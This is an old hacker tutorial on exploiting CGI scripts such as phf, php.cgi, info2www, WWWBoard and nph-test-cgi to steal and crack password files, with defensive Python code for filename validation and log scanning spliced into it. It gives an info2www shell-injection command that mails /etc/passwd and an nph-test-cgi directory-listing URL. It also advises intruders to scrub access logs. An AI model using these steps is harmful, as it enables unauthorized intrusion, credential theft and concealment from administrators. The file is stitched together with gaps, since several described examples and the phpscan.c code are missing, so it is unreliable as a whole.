This is a great article on CGI and their exploits. Please excuse the grammar but it is VERY good reading. Hitman did a great job. Keep it up.
by
Da Hitman (daemon@mac-addict.com)
www.neverness.net/MaCrack
**With special help from HardCoded†**
>--==--[Intro]--==--<
This text primarily concerns CGI (Common Gateway Interface) scripts/software, their many holes/bugs, and how a hacker can exploit them to grab hold of the fabled passwd file and do other misc stuff.
The most famous/outdated exploit in my opinion is the PHF (packet handler function) exploit. The PHF exploit is/was a hole in most servers that allowed u to access the passwd file without a login or pass and/or delete any file on the system. You would acquire the passwd file by adding a string to the URL in your browser like this:
Some foreign servers are still vulnerable to this exploit. But usually you will get a message saying
"The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it."
If u get a blinking message saying "You have been caught on Candid Camera!" don't piss in yer pants, they rarely ever report u. But if u get....
consider yerself lucky. You have the passwd file. Use MacCrac or another password cracker to try to "crack" it. If u do actually "crack" the passwd file and choose to log in and hax0r the box, then remember to audit the logs, especially the most important log:
/usr/local/etc/httpd/logs/access_log file
and if it has it...
/www/logs
because it will have logged your phf usage.
u can also view any file on the system by typing in the browser:
and u might land yerself in jail if u are not careful and don't realize that most admins with the PHF cgi know of / have been told about this old ass exploit. :)
--< PHP Exploit >--
The programs phpscan.c and phpget.c together exploit a hole in the php.cgi code which allows remote users to read ANY file on the system that the http daemon has access to. You use phpscan.c to scan from a list of hosts and phpget.c to retrieve files from the host.
phpscan.c
---CUT-----
/*
phpscan.c : php.cgi vulnerable server scanning program.
Basically a modified phf scanner, by Alhambra of The Guild.
--< info2www >--
The info2www CGI script changes GNU files to "info" files but doesn't check user-provided filenames before opening them, thus allowing us to open the system's files and execute shell commands.
ex:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$
oh jinkies! it just mailed us the passwd file! :)
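The missing check is the whole bug. As an added example (my code, not info2www's, and not part of the original text), the Python below validates a user-supplied filename the way a CGI that opens files should: it refuses shell metacharacters such as the trailing '|' in the session above (which Perl's two-argument open() treats as a command to run rather than a file to read), refuses absolute paths, and confines the resolved path to one base directory so '../' chains cannot climb out to /etc/passwd. The function names and the base directory are assumptions.

```python
"""
Added example, not info2www's code: the filename check that script lacked.
A CGI that opens a file named by the user must refuse shell metacharacters,
refuse absolute paths, and confine the resolved path to one base directory.
The function names and the base directory are assumptions for this example.
"""
import os
import tempfile

# Characters that mean something to a shell or to Perl's two-argument open();
# none of them belong in the name of an info file.
SHELL_META = set("|;&<>`$()\n\r\0")


class UnsafeFilename(ValueError):
    """Raised when a user-supplied filename is rejected."""


def safe_info_path(user_value, base_dir):
    """Return the absolute path of user_value inside base_dir, or raise UnsafeFilename."""
    if not user_value or any(ch in SHELL_META for ch in user_value):
        raise UnsafeFilename("empty name or shell metacharacter")
    if os.path.isabs(user_value):
        raise UnsafeFilename("absolute path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # realpath() collapses '..' and follows symlinks, so the containment test
    # runs on the real path; commonpath() avoids the '/info' vs '/info2' prefix trap.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeFilename("escapes base directory")
    return candidate


def is_safe_info_name(user_value, base_dir):
    """True if safe_info_path() accepts the name, False if it rejects it."""
    try:
        safe_info_path(user_value, base_dir)
        return True
    except UnsafeFilename:
        return False


def open_info_file(user_value, base_dir):
    """Open the requested info file read-only, after validating its name."""
    return open(safe_info_path(user_value, base_dir), "rb")


def demo_base_dir():
    """Create a throwaway directory to stand in for the info files directory (assumption)."""
    return tempfile.mkdtemp(prefix="info-")


if __name__ == "__main__":
    # Constructed inputs: a legitimate name, a traversal chain, and the mail pipe from the session above.
    base = demo_base_dir()
    for name in ("emacs.info",
                 "../../../../../../../etc/passwd",
                 "(../../../../../../../bin/mail jami </etc/passwd|)"):
        verdict = "accepted" if is_safe_info_name(name, base) else "rejected"
        print(f"{name!r}: {verdict}")
```

The order of the checks matters: the metacharacter test runs first because a name like the mail pipe above would otherwise be examined as a path, and the containment test runs on the real path rather than on the raw string so that `sub/../../x` is caught even though it contains no `../` at the start.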
--< Matt’s WWWboard script >--
Matt should stop making these scripts, really, no joke. He is like handing a timebomb to a sys admin. Let's take a look at one of his exploitable scripts. (Let's not mention the textcounter.pl script, for his sake.)
[WWWboard Script]
This script is very easily exploitable. By default you have to put the passwd.txt file in the same directory as your wwwboard. So what does that mean? It means that itz sploitin time! Here's how we do it:
All we do now is add some stuff behind the encrypted passwd entry. The things I am adding are just the User ID, Group ID, home dir, shell, etc. This is because we are gonna run a passwd cracker on it, and since Matt uses the same encryption scheme, it is vulnerable to a brute-force dictionary attack. (i told u he is a dumbass)
Run the passwd cracker and voilà, u have the password! Now u have access to delete/edit files on the victim's WWWboard!
--< NPH-TEST CGI >--
This script can be exploited to obtain a file listing of any directory on the server. Here's an example of how we would exploit this script:
http://www.target.com/cgi-bin/nph-test-cgi?/*
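The access_log the PHF section tells you to audit is also where an admin sees every one of these probes, from phf through nph-test-cgi. As an added example that is not part of this file, the Python below parses Common Log Format lines and flags requests to the scripts discussed here (phf, php.cgi, info2www, nph-test-cgi, WWWBoard's passwd.txt) plus the '../' chains and /etc/passwd strings those requests carry, decoding %-escapes first so encoded traversal is not missed. The log lines are constructed, and the URL patterns are assumptions about how those scripts show up in a request.

```python
"""
Added example, not part of the original text: flag requests in an access_log
that target the old CGI scripts discussed in this file. The sample log lines
are constructed; the URL patterns are assumptions about how the scripts appear.
"""
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
_CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Script names come from the text; where they sit in the URL tree is an assumption.
SUSPECT_SCRIPTS = {
    "phf": re.compile(r"/phf\b"),
    "php.cgi": re.compile(r"/php\.cgi\b"),
    "info2www": re.compile(r"/info2www\b"),
    "nph-test-cgi": re.compile(r"/nph-test-cgi\b"),
    "wwwboard passwd.txt": re.compile(r"/wwwboard/passwd\.txt\b", re.I),
}
SUSPECT_PAYLOADS = {
    "directory traversal": re.compile(r"(?:\.\./){2,}"),
    "passwd file reference": re.compile(r"/etc/passwd"),
}


def parse_clf(line):
    """Return the fields of one Common Log Format line as a dict, or None if it does not parse."""
    m = _CLF.match(line)
    return m.groupdict() if m else None


def classify_request(path):
    """Return the reasons a request path looks like a probe of the CGI holes above ([] if clean)."""
    decoded = unquote(path)  # %2e%2e%2f style encoding hides '../' from a naive grep
    reasons = [name for name, rx in SUSPECT_SCRIPTS.items() if rx.search(decoded)]
    reasons += [name for name, rx in SUSPECT_PAYLOADS.items() if rx.search(decoded)]
    return reasons


def scan_access_log(lines):
    """Return (host, time, status, path, reasons) for each request that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue  # rotated-log headers, truncated lines, etc.
        reasons = classify_request(rec["path"])
        if reasons:
            hits.append((rec["host"], rec["time"], rec["status"], rec["path"], reasons))
    return hits


# Constructed sample log lines (documentation IP ranges, not any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/1998:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326',
    '203.0.113.5 - - [10/Oct/1998:13:55:40 -0700] "GET /cgi-bin/phf?Qname=test HTTP/1.0" 404 180',
    '198.51.100.7 - - [10/Oct/1998:14:02:01 -0700] "GET /cgi-bin/nph-test-cgi?/* HTTP/1.0" 200 512',
    '198.51.100.7 - - [10/Oct/1998:14:02:09 -0700] "GET /cgi-bin/php.cgi?%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1201',
    '192.0.2.9 - - [10/Oct/1998:14:10:00 -0700] "GET /wwwboard/passwd.txt HTTP/1.0" 200 40',
]

if __name__ == "__main__":
    for host, when, status, path, reasons in scan_access_log(SAMPLE_LOG):
        print(f"{host} {when} {status} {path} -> {', '.join(reasons)}")
```

Note that the status code is reported but not used to filter: a 404 for phf still tells you somebody is walking through a list of old CGI holes, which is exactly what the PHF section says admins have been told to watch for, and a 200 on /wwwboard/passwd.txt means the file was served.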
--==--[The Top 5 Exploitable CGI Scripts/Programs]--==--
I rounded up all the vulnerable cgi scripts/programs, decided which were my faves and the most popular (now or at the time), and posted them down below. :)
Hopefully this small lame file gave u some information on each CGI program and how to exploit it. I'd rather have u have some knowledge than run xCGI on a site and not know what the hell campas/php/webgais, etc. is or does. ;D
If i left sumtin out or maybe missed an important exploit, KINDLY email me and tell me of da prob. ;)